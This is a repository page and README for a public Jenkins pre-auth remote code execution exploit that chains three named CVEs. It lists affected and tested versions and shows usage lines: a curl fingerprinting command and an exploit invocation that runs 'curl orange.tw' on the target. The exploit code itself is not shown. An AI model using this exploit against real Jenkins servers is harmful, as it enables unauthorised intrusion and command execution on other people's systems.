orangetw/ awesome-jenkins-rce-2019
Need help with awesome-jenkins-rce-2019?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.
About the developer
548 Stars 
125 Forks 
9 Commits 
2 Opened issues 
Description
There is no pre-auth RCE in Jenkins since May 2017, but this is the one!
Services available
Contributors list
Readme
awesome-jenkins-rce-2019
There is no pre-auth RCE in Jenkins since May 2017, but this is the one!
It chains CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029 to a more reliable and elegant pre-auth remote code execution!
Affect list
-
ANONYMOUS_READ disable
- Jenkins version < 2.138
-
ANONYMOUS_READ enable(or with a normal user account)
- Jenkins build time < 2019-01-28
Usage
$ curl -s -I http://jenkins/| grep X-Jenkins X-Jenkins: 2.137 X-Jenkins-Session: 20f72c2e X-Jenkins-CLI-Port: 50000 X-Jenkins-CLI2-Port: 50000$ python exp.py http://jenkins/ 'curl orange.tw' [] ANONYMOUS_READ disable! [] Bypass with CVE-2018-1000861! [*] Exploit success!(it should be :P)
Tested on
- Jenkins 2.53
- Jenkins 2.122
- Jenkins 2.137
- Jenkins 2.138 with ANONYMOUS_READ enable
- Jenkins 2.152 with ANONYMOUS_READ enable
- Jenkins 2.153 with ANONYMOUS_READ enable
- Script Security Plugin 1.43
- Script Security Plugin 1.48
Acknowledgements
- @orange_8361 for CVE-2018-1000861
- @0ang3el for CVE-2019-1003005
- @webpentest for CVE-2019-1003029
Part slides from my HITB AMS 2019 talk:
